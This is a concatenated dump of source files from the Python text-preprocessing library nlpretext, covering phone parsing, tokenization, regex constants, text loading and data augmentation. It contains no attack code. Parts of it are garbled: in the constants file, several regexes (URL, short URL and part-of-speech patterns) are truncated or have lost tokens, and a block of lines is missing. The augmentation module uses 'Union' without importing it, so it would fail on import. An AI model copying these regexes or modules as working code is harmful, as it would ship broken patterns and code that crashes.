74 |         all_phone_numbers.extend(new_numbers_founds)
75 |     return list(set(all_phone_numbers))
76 | 
77 | 
78 | class PhoneParser:
79 |     """
80 |     Python port of Google's libphonenumber.
81 |     https://github.com/daviddrysdale/python-phonenumbers.
82 |     """
83 | 
84 |     def __init__(self):
85 |         self.region_code = None
86 |         self.text = None
87 |         self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None
88 | 
89 |     @property
90 |     def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:
91 |         return self.__parsed_num
92 | 
93 |     @parsed_num.setter
94 |     def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:
95 |         self.__parsed_num = value
96 | 
97 |     def parse_number(
98 |         self, text: str, region_code: Optional[str] = None
99 |     ) -> Optional[_phonenumbers.PhoneNumber]:
100 |         """
101 |         Extract phone number from text.
102 | 
103 |         Parameters
104 |         ----------
105 |         text: str
106 |         region_code : str, optional
107 |             If specified, will find the number of the specified country.
108 |             eg. 06.00.00.00.00 if "FR" is specified.
109 |             If not specified, only works for international-formatted phone numbers.
110 |             - ie. phone number with +country code specified
111 |             eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
112 |             supported value: look SUPPORTED_COUNTRY variable.
113 | 
114 |         Returns
115 |         -------
116 |         phonenumbers.PhoneNumber
117 |             The parsed number
118 | 
119 |         Raises
120 |         ------
121 |         NumberParseException
122 |             If the string doesn't contain a phone number or if the parser fails.
123 |         """
124 |         self.region_code = region_code
125 |         self.text = text
126 |         self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(
127 |             self.text, self.region_code
128 |         )
129 |         return self.parsed_num
130 | 
131 |     def format_number(self, num_format: str) -> str:
132 |         """
133 |         Convert a phone number to another standard format.
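
        The target format must be one of the keys of FORMAT_NUMBERS, eg.
        (illustrative values) a number parsed as "+33 6 00 00 00 00" is
        rendered "+33600000000" with 'E164'.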
134 | 135 | Parameters 136 | ---------- 137 | num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'} 138 | 139 | Returns 140 | ------- 141 | str 142 | Number formatted 143 | """ 144 | standard_format = FORMAT_NUMBERS.get(num_format) 145 | if standard_format is None: 146 | raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}") 147 | if self.parsed_num is None: 148 | raise ValueError(f"Could not parse phone number {self.parsed_num}") 149 | formatted_number: Optional[str] = _phonenumbers.format_number( 150 | self.parsed_num, standard_format 151 | ) 152 | if formatted_number is None: 153 | raise ValueError(f"Could not format phone number {formatted_number}") 154 | return formatted_number 155 | -------------------------------------------------------------------------------- /nlpretext/token/tokenizer.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
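#
# Usage sketch (illustrative, not part of the original module):
#
#     from nlpretext.token.tokenizer import tokenize, untokenize
#     tokens = tokenize("Let's eat, grandpa!", lang_module="en_spacy")
#     text = untokenize(tokens, lang="en")
#
# Note that tokenize() downloads the required spacy model on first use (see
# _load_spacy_model below), so the first call may be slow.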
18 | # mypy: disable-error-code="assignment"
19 | 
20 | from typing import Any, List, Optional, Union
21 | 
22 | import os
23 | import re
24 | 
25 | import nltk
26 | import spacy
27 | from sacremoses import MosesDetokenizer, MosesTokenizer
28 | 
29 | MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
30 | SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}
31 | 
32 | 
33 | class LanguageNotHandled(Exception):
34 |     pass
35 | 
36 | 
37 | class LanguageNotInstalledError(Exception):
38 |     pass
39 | 
40 | 
41 | class SpacyModel:
42 |     class SingletonSpacyModel:
43 |         def __init__(self, lang: str) -> None:
44 |             self.lang = lang
45 |             if lang == "en":
46 |                 self.model = _load_spacy_model("en_core_web_sm")
47 |             elif lang == "fr":
48 |                 self.model = _load_spacy_model("fr_core_news_sm")
49 |             elif lang == "ko":
50 |                 self.model = spacy.blank("ko")
51 |             elif lang == "ja":
52 |                 self.model = spacy.blank("ja")
53 |             else:
54 |                 raise LanguageNotHandled("This spacy model is not available")
55 | 
56 |     model: Optional[spacy.language.Language] = None
57 | 
58 |     def __init__(self, lang):
59 |         if not SpacyModel.model:
60 |             SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model
61 | 
62 |     def get_lang_model(self) -> Optional[str]:  # noqa: D102
63 |         if self.model:
64 |             lang: str = self.model.lang
65 |             return lang
66 |         return None
67 | 
68 | 
69 | def _load_spacy_model(model: str) -> Any:
70 |     try:
71 |         return spacy.load(model)
72 |     except OSError as e:
73 |         if MODEL_REGEX.match(model):
74 |             os.system(f"python -m spacy download {model}")  # nosec
75 |             return spacy.load(model)
76 |         else:
77 |             raise LanguageNotInstalledError(
78 |                 f"Model {model} is not installed. "
79 |                 f"To install, run: python -m spacy download {model}"
80 |             ) from e
81 | 
82 | 
83 | def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
84 |     """
85 |     Function that gets the right tokenizer given the language.
86 | 
87 |     Parameters
88 |     ----------
89 |     lang : str
90 |         Language in which text is written. Languages handled: ["en", "fr", "ko", "ja"]
91 | 
92 |     Returns
93 |     -------
94 |     spacy.tokenizer.Tokenizer
95 |         spacy tokenizer
96 |     """
97 |     model = SpacyModel(lang).model
98 |     if model:
99 |         return model.tokenizer
100 |     return None
101 | 
102 | 
103 | def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
104 |     """
105 |     Convert text to a list of tokens.
106 | 
107 |     Parameters
108 |     ----------
109 |     lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
110 |         choose the tokenization module according to the language and the implementation.
111 |         Recommended: Spacy (faster, better results). To process other languages
112 |         import models.Spacy_models
113 | 
114 |     Returns
115 |     -------
116 |     list
117 |         list of string
118 | 
119 |     Raises
120 |     ------
121 |     ValueError
122 |         If lang_module is not a valid module name
123 |     """
124 |     if lang_module not in SUPPORTED_LANG_MODULES:
125 |         raise ValueError(
126 |             f"Invalid lang_module: {lang_module}. "
127 |             f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
128 |         )
129 | 
130 |     tokenized_words: List[str] = []
131 |     if "spacy" in lang_module:
132 |         lang = lang_module.split("_")[0]
133 |         spacymodel = _get_spacy_tokenizer(lang)
134 |         if spacymodel:
135 |             spacydoc = spacymodel(text)
136 |             tokenized_words = [spacy_token.text for spacy_token in spacydoc]
137 |     if lang_module == "en_nltk":
138 |         tokenized_words = nltk.word_tokenize(text)
139 |     if lang_module == "fr_moses":
140 |         tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)
141 | 
142 |     return tokenized_words
143 | 
144 | 
145 | def untokenize(tokens: List[str], lang: str = "fr") -> str:
146 |     """
147 |     Inputs a list of tokens, outputs a string.
148 |     ["J'", 'ai'] >>> "J' ai".
149 | 
150 |     Parameters
151 |     ----------
152 |     lang : string
153 |         language code
154 | 
155 |     Returns
156 |     -------
157 |     string
158 |         text
159 |     """
160 |     d = MosesDetokenizer(lang=lang)
161 |     text: str = d.detokenize(tokens, unescape=False)
162 |     return text
163 | 
164 | 
165 | def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str:  # noqa: D103
166 |     if isinstance(tokens_or_str, str):
167 |         return tokens_or_str
168 |     if isinstance(tokens_or_str, list):
169 |         return untokenize(tokens_or_str)
170 |     if tokens_or_str is None:
171 |         return ""
172 |     raise TypeError("Please input string or tokens")
173 | 
174 | 
175 | def convert_string_to_tokens(  # noqa: D103
176 |     tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
177 | ) -> List[str]:
178 |     if isinstance(tokens_or_str, str):
179 |         return tokenize(tokens_or_str, lang_module=lang_module)
180 |     if isinstance(tokens_or_str, list):
181 |         return tokens_or_str
182 |     if tokens_or_str is None:
183 |         return []
184 |     raise TypeError("Please input string or tokens")
185 | 
--------------------------------------------------------------------------------
/nlpretext/_config/constants.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 | # mypy: disable-error-code="attr-defined"
16 | 
17 | """
18 | Collection of regular expressions and other (small, generally useful) constants.
19 | Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
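For example (illustrative): EMAIL_REGEX.sub("*EMAIL*", text) masks e-mail
addresses, and TEXT_FILE_FORMATS_PATTERN backs the file-format check in
_utils.file_loader.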
20 | """ 21 | import re 22 | import sys 23 | import unicodedata 24 | 25 | import regex 26 | 27 | NUMERIC_NE_TYPES = { 28 | "ORDINAL", 29 | "CARDINAL", 30 | "MONEY", 31 | "QUANTITY", 32 | "PERCENT", 33 | "TIME", 34 | "DATE", 35 | } 36 | SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"} 37 | OBJ_DEPS = {"attr", "dobj", "dative", "oprd"} 38 | AUX_DEPS = {"aux", "auxpass", "neg"} 39 | 40 | REPORTING_VERBS = { 41 | "according", 42 | "accuse", 43 | "acknowledge", 44 | "add", 45 | "admit", 46 | "agree", 47 | "allege", 48 | "announce", 49 | "argue", 50 | "ask", 51 | "assert", 52 | "believe", 53 | "blame", 54 | "charge", 55 | "cite", 56 | "claim", 57 | "complain", 58 | "concede", 59 | "conclude", 60 | "confirm", 61 | "contend", 62 | "criticize", 63 | "declare", 64 | "decline", 65 | "deny", 66 | "describe", 67 | "disagree", 68 | "disclose", 69 | "estimate", 70 | "explain", 71 | "fear", 72 | "hope", 73 | "insist", 74 | "maintain", 75 | "mention", 76 | "note", 77 | "observe", 78 | "order", 79 | "predict", 80 | "promise", 81 | "recall", 82 | "recommend", 83 | "reply", 84 | "report", 85 | "say", 86 | "state", 87 | "stress", 88 | "suggest", 89 | "tell", 90 | "testify", 91 | "think", 92 | "urge", 93 | "warn", 94 | "worry", 95 | "write", 96 | } 97 | 98 | CURRENCIES = { 99 | "$": "USD", 100 | "zł": "PLN", 101 | "£": "GBP", 102 | "¥": "JPY", 103 | "฿": "THB", 104 | "₡": "CRC", 105 | "₦": "NGN", 106 | "₩": "KRW", 107 | "₪": "ILS", 108 | "₫": "VND", 109 | "€": "EUR", 110 | "₱": "PHP", 111 | "₲": "PYG", 112 | "₴": "UAH", 113 | "₹": "INR", 114 | } 115 | 116 | POS_REGEX_PATTERNS = { 117 | "en": { 118 | "NP": r"? * ( ? ?)* (| ?)+", 119 | "PP": r" ? * ( ? ?)* ( ?)+", 120 | "VP": r"* * ", 121 | } 122 | } 123 | 124 | PUNCT_TRANSLATE_UNICODE = dict.fromkeys( 125 | (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")), 126 | " ", 127 | ) 128 | 129 | 130 | ACRONYM_REGEX = re.compile( 131 | r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))", 132 | flags=re.UNICODE, 133 | ) 134 | EMAIL_REGEX = re.compile( 135 | r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))", 136 | flags=re.IGNORECASE | re.UNICODE, 137 | ) 138 | PHONE_REGEX = re.compile( 139 | r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501 140 | ) 141 | NUMBERS_REGEX = re.compile( 142 | r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|" 143 | r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))" 144 | ) 145 | CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES))) 146 | LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+") 147 | NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+") 148 | URL_REGEX = re.compile( 149 | r"(?:|(?= 224.0.0.0 163 | # excludes network & broadcast addresses 164 | # (first & last IP address of each class) 165 | r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])" 166 | r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}" 167 | r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))" 168 | r"|" 169 | # host name 170 | r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)" 171 | # domain name 172 | r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*" 173 | # TLD identifier 174 | r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")" 175 | # port number 176 | r"(?::\d{2,5})?" 177 | # resource path 178 | r"(?:/\S*)?" 
r"(?:$|(?![\w?!+&/]))", 179 | flags=re.UNICODE | re.IGNORECASE, 180 | ) # source: https://gist.github.com/dperini/729294 181 | SHORT_URL_REGEX = re.compile( 182 | r"(?:^|(?") 221 | 222 | # TEXT LOADER 223 | TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$") 224 | -------------------------------------------------------------------------------- /nlpretext/textloader.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | from types import ModuleType 16 | from typing import Any, List, Optional, Union 17 | 18 | import sys 19 | import warnings 20 | 21 | import pandas as pd 22 | 23 | try: 24 | from nlpretext._utils import daskloader 25 | except ImportError: 26 | warnings.warn( 27 | "Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]", # noqa: E501 28 | stacklevel=2, 29 | ) 30 | 31 | from nlpretext._utils import pandasloader 32 | from nlpretext._utils.file_loader import check_text_file_format 33 | from nlpretext.preprocessor import Preprocessor 34 | 35 | 36 | class TextLoader: 37 | def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True): 38 | """ 39 | Initialize DataLoader object to retrieve text data. 40 | 41 | Parameters 42 | ---------- 43 | text_column: string 44 | name of the column containing texts in json / csv / parquet files 45 | encoding: string 46 | encoding of the text to be loaded, can be utf-8 or latin-1 for example 47 | file_format: string | None 48 | format of the files to be loaded 49 | use_dask: bool 50 | use dask to load text 51 | """ 52 | self.text_column = text_column 53 | self.encoding = encoding 54 | self.file_format = file_format 55 | 56 | self.use_dask = use_dask 57 | 58 | self.loader: ModuleType 59 | if self.use_dask: 60 | if "dask" in sys.modules: 61 | self.loader = daskloader 62 | else: 63 | warnings.warn( 64 | "Dask is not intalled, switching to pandas. Run pip install dask to use dask", 65 | stacklevel=2, 66 | ) 67 | self.use_dask = False 68 | self.loader = pandasloader 69 | else: 70 | self.loader = pandasloader 71 | 72 | def __repr__(self): 73 | """Method to represent class attributes.""" 74 | class_repr_dict = { 75 | "text_column": self.text_column, 76 | "encoding": self.encoding, 77 | "file_format": self.file_format, 78 | "use_dask": self.use_dask, 79 | } 80 | return f"TextLoader({class_repr_dict})" 81 | 82 | def _read_text_txt(self, files_path): 83 | """ 84 | Read txt text files stored in files_path. 
85 | 86 | Parameters 87 | ---------- 88 | files_path : string | list[string] 89 | single or multiple files path 90 | 91 | Returns 92 | ------- 93 | dask.dataframe | pandas.DataFrame 94 | """ 95 | text_ddf = self.loader.read_text(files_path, encoding=self.encoding) 96 | text_ddf.columns = [self.text_column] 97 | return text_ddf 98 | 99 | def _read_text_json(self, files_path): 100 | """ 101 | Read json text files stored in files_path. 102 | 103 | Parameters 104 | ---------- 105 | files_path : string | list[string] 106 | single or multiple files path 107 | 108 | Returns 109 | ------- 110 | dask.dataframe | pandas.DataFrame 111 | """ 112 | text_ddf = self.loader.read_json(files_path, encoding=self.encoding) 113 | try: 114 | return text_ddf[[self.text_column]] 115 | except KeyError as e: 116 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 117 | 118 | def _read_text_csv(self, files_path): 119 | """ 120 | Read csv text files stored in files_path. 121 | 122 | Parameters 123 | ---------- 124 | files_path : string | list[string] 125 | single or multiple files path 126 | 127 | Returns 128 | ------- 129 | dask.dataframe | pandas.DataFrame 130 | """ 131 | text_ddf = self.loader.read_csv(files_path, encoding=self.encoding) 132 | try: 133 | return text_ddf[[self.text_column]] 134 | except KeyError as e: 135 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 136 | 137 | def _read_text_parquet(self, files_path): 138 | """ 139 | Read parquet text files stored in files_path. 140 | 141 | Parameters 142 | ---------- 143 | files_path : string | list[string] 144 | single or multiple files path 145 | 146 | Returns 147 | ------- 148 | dask.dataframe | pandas.DataFrame 149 | """ 150 | text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding) 151 | try: 152 | return text_ddf[[self.text_column]] 153 | except KeyError as e: 154 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e 155 | 156 | def read_text( 157 | self, 158 | files_path: Union[str, List[str]], 159 | file_format: Optional[str] = None, 160 | encoding: Optional[str] = None, 161 | compute_to_pandas: bool = True, 162 | preprocessor: Optional[Preprocessor] = None, 163 | ) -> Union[pd.DataFrame, Any]: 164 | """ 165 | Read the text files stored in files_path. 
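
        The file format is inferred from the extension when not specified, eg.
        (illustrative) TextLoader(text_column="text").read_text("data/*.csv")
        loads the "text" column of every matched csv file.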
166 | 
167 |         Parameters
168 |         ----------
169 |         files_path: string | list[string]
170 |             single or multiple files path
171 |         file_format: string
172 |             Format of the files to be loaded, to be selected among csv, json, parquet or txt
173 |         encoding: string
174 |             encoding of the text to be loaded, can be utf-8 or latin-1 for example
175 |         compute_to_pandas: bool
176 |             True if user wants Dask Dataframe to be computed as pandas DF, False otherwise
177 |         preprocessor: nlpretext.preprocessor.Preprocessor
178 |             NLPretext preprocessor can be specified to pre-process text after loading
179 | 
180 |         Returns
181 |         -------
182 |         dask.dataframe | pandas.DataFrame
183 |         """
184 |         if encoding is not None:
185 |             self.encoding = encoding
186 | 
187 |         if file_format is not None:
188 |             self.file_format = file_format
189 |         else:
190 |             self.file_format = check_text_file_format(files_path)
191 | 
192 |         reader_mapping = {
193 |             "csv": self._read_text_csv,
194 |             "txt": self._read_text_txt,
195 |             "json": self._read_text_json,
196 |             "parquet": self._read_text_parquet,
197 |         }
198 |         reader = reader_mapping.get(self.file_format)
199 |         if reader is None:
200 |             raise ValueError("Format not handled")
201 |         text = reader(files_path)
202 | 
203 |         if preprocessor is not None:
204 |             if isinstance(preprocessor, Preprocessor):
205 |                 text[self.text_column] = text[self.text_column].apply(preprocessor.run)
206 |             else:
207 |                 raise ValueError("Only NLPretext preprocessors can be specified")
208 | 
209 |         if compute_to_pandas and self.use_dask:
210 |             return text.compute()
211 |         return text
--------------------------------------------------------------------------------
/nlpretext/augmentation/text_augmentation.py:
--------------------------------------------------------------------------------
1 | from typing import Any, Dict, List, Optional, Tuple
2 | 
3 | import logging
4 | import re
5 | from itertools import combinations
6 | 
7 | import nlpaug.augmenter.word as naw
8 | 
9 | 
10 | class CouldNotAugment(ValueError):  # noqa: D101
11 |     pass
12 | 
13 | 
14 | class UnavailableAugmenter(ValueError):  # noqa: D101
15 |     pass
16 | 
17 | 
18 | def augment_text(
19 |     text: str,
20 |     method: str,
21 |     stopwords: Optional[List[str]] = None,
22 |     entities: Optional[List[Dict[str, Any]]] = None,
23 | ) -> Tuple[str, List[Dict[str, Any]]]:
24 |     """
25 |     Given a text with or without associated entities, generate a new text by
26 |     modifying some words in the initial one; the modifications depend on the chosen
27 |     method (substitution with synonym, addition, deletion). If entities are
28 |     given as input, they will remain unchanged. If you want some words other
29 |     than entities to remain unchanged, specify them within the stopwords argument.
30 | 
31 |     Parameters
32 |     ----------
33 |     text : string
34 |     method : {'wordnet_synonym', 'aug_sub_bert'}
35 |         augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
36 |     stopwords : list, optional
37 |         list of words to freeze throughout the augmentation
38 |     entities : list, optional
39 |         entities associated to text if any, must be in the following format:
40 |         [
41 |             {
42 |                 'entity': str,
43 |                 'word': str,
44 |                 'startCharIndex': int,
45 |                 'endCharIndex': int
46 |             },
47 |             {
48 |                 ...
49 | } 50 | ] 51 | 52 | Returns 53 | ------- 54 | Augmented text and optional augmented entities 55 | """ 56 | augmenter = get_augmenter(method, stopwords) 57 | augmented_text = augmenter.augment(text) 58 | if entities is not None: 59 | return process_entities_and_text(entities, text, augmented_text) 60 | return augmented_text, [] 61 | 62 | 63 | def process_entities_and_text( 64 | entities: List[Dict[str, Any]], text: str, augmented_text: str 65 | ) -> Tuple[str, List[Dict[str, Any]]]: 66 | """ 67 | Given a list of initial entities, verify that they have not been altered by 68 | the data augmentation operation and are still in the augmented text. 69 | 70 | Parameters 71 | ---------- 72 | entities: list 73 | entities associated to text, must be in the following format: 74 | [ 75 | { 76 | 'entity': str, 77 | 'word': str, 78 | 'startCharIndex': int, 79 | 'endCharIndex': int 80 | }, 81 | { 82 | ... 83 | } 84 | ] 85 | text: str 86 | initial text 87 | augmented_text: str 88 | new text resulting of data augmentation operation 89 | 90 | Returns 91 | ------- 92 | Augmented text and entities with their updated position in augmented text 93 | """ 94 | formatted_entities = [ 95 | ( 96 | text[entities[i]["startCharIndex"] : entities[i]["endCharIndex"]].strip(), 97 | entities[i]["entity"], 98 | ) 99 | for i in range(len(entities)) 100 | ] 101 | if are_entities_in_augmented_text(entities, augmented_text): 102 | augmented_entities = get_augmented_entities(augmented_text, formatted_entities) 103 | clean_entities = clean_sentence_entities(augmented_text, augmented_entities) 104 | return augmented_text, clean_entities 105 | raise CouldNotAugment("Text was not correctly augmented because entities were altered") 106 | 107 | 108 | def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool: 109 | """ 110 | Given a list of entities, check if all the words associated to each entity 111 | are still present in augmented text. 112 | 113 | Parameters 114 | ---------- 115 | entities : list 116 | entities associated to initial text, must be in the following format: 117 | [ 118 | { 119 | 'entity': str, 120 | 'word': str, 121 | 'startCharIndex': int, 122 | 'endCharIndex': int 123 | }, 124 | { 125 | ... 126 | } 127 | ] 128 | augmented_text : str 129 | 130 | Returns 131 | ------- 132 | True if all entities are present in augmented text, False otherwise 133 | """ 134 | check = True 135 | for ent in entities: 136 | if ent["word"] not in augmented_text: 137 | check = False 138 | break 139 | return check 140 | 141 | 142 | def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> Union[naw.SynonymAug, naw.ContextualWordEmbsAug]: 143 | """ 144 | Initialize an augmenter depending on the given method. 145 | 146 | Parameters 147 | ---------- 148 | method : str (supported methods: wordnet_synonym and aug_sub_bert) 149 | stopwords : list 150 | list of words to freeze throughout the augmentation 151 | 152 | Returns 153 | ------- 154 | Initialized nlpaug augmenter 155 | """ 156 | if method == "wordnet_synonym": 157 | return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords) 158 | if method == "aug_sub_bert": 159 | return naw.ContextualWordEmbsAug( 160 | model_path="bert-base-uncased", action="substitute", stopwords=stopwords 161 | ) 162 | raise UnavailableAugmenter( 163 | "The given augmenter is not supported. You must choose one "
164 | "of the following: wordnet_synonym or aug_sub_bert" 165 | ) 166 | 167 | 168 | def get_augmented_entities( 169 | sentence_augmented: str, entities: List[Tuple[str, Any]] 170 | ) -> List[Dict[str, Any]]: 171 | """ 172 | Get entities with updated positions (start and end) in augmented text. 173 | 174 | Parameters 175 | ---------- 176 | sentence_augmented : str 177 | augmented text 178 | entities : list 179 | entities associated to initial text, as a list of tuples 180 | (the formatted output built in process_entities_and_text), 181 | in the following format: 182 | [ 183 | ( 184 | 'word', 185 | 'entity type' 186 | ), 187 | ( 188 | ... 189 | ) 190 | ] 191 | 192 | Returns 193 | ------- 194 | Entities with updated positions related to augmented text 195 | """ 196 | entities_augmented = [] 197 | for entity in entities: 198 | search = re.search(re.escape(entity[0].strip()), sentence_augmented) 199 | if search: 200 | start_index = search.start() 201 | end_index = search.end() 202 | new_entity = { 203 | "entity": entity[1], 204 | "word": sentence_augmented[start_index:end_index], 205 | "startCharIndex": start_index, 206 | "endCharIndex": end_index, 207 | } 208 | entities_augmented.append(new_entity) 209 | return entities_augmented 210 | 211 | 212 | def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]: 213 | """ 214 | Pairwise check of entities to remove nested entities; the longest entity is kept. 215 | 216 | Parameters 217 | ---------- 218 | text : str 219 | augmented text 220 | entities : list 221 | entities associated to augmented text, must be in the following format: 222 | [ 223 | { 224 | 'entity': str, 225 | 'word': str, 226 | 'startCharIndex': int, 227 | 'endCharIndex': int 228 | }, 229 | { 230 | ... 231 | } 232 | ] 233 | 234 | Returns 235 | ------- 236 | Cleaned entities 237 | """ 238 | entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}] 239 | for element1, element2 in combinations(entities_to_clean, 2): 240 | result = check_interval_included(element1, element2) 241 | if result is not None: 242 | try: 243 | entities_to_clean.remove(result[0]) 244 | except ValueError: 245 | logging.warning( 246 | "Can't remove entity: {}\nentities are now: {}\nfor sentence: {}".format( 247 | result, entities_to_clean, text 248 | ) 249 | ) 250 | continue 251 | return entities_to_clean 252 | 253 | 254 | def check_interval_included( 255 | element1: Dict[str, Any], element2: Dict[str, Any] 256 | ) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]: 257 | """ 258 | Comparison of two entities on start and end positions to find if they are nested. 259 | 260 | Parameters 261 | ---------- 262 | element1 : dict 263 | element2 : dict 264 | both of them in the following format 265 | { 266 | 'entity': str, 267 | 'word': str, 268 | 'startCharIndex': int, 269 | 'endCharIndex': int 270 | } 271 | 272 | Returns 273 | ------- 274 | If there is an entity to remove among the two returns a tuple 275 | (element to remove, element to keep).
276 | If not, returns None 277 | """ 278 | if ( 279 | (element1 != element2) 280 | and (element1["startCharIndex"] >= element2["startCharIndex"]) 281 | and (element1["endCharIndex"] <= element2["endCharIndex"]) 282 | ): 283 | return element1, element2 284 | if ( 285 | (element1 != element2) 286 | and (element2["startCharIndex"] >= element1["startCharIndex"]) 287 | and (element2["endCharIndex"] <= element1["endCharIndex"]) 288 | ): 289 | return element2, element1 290 | if ( 291 | (element1 != element2) 292 | and (element1["startCharIndex"] >= element2["startCharIndex"]) 293 | and (element1["endCharIndex"] >= element2["endCharIndex"]) 294 | and (element1["startCharIndex"] <= element2["endCharIndex"] - 1) 295 | ): 296 | return element1, element2 297 | if ( 298 | (element1 != element2) 299 | and (element2["startCharIndex"] >= element1["startCharIndex"]) 300 | and (element2["endCharIndex"] >= element1["endCharIndex"]) 301 | and (element2["startCharIndex"] <= element1["endCharIndex"] - 1) 302 | ): 303 | return element2, element1 304 | return None 305 | -------------------------------------------------------------------------------- /tests/test_textloader.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
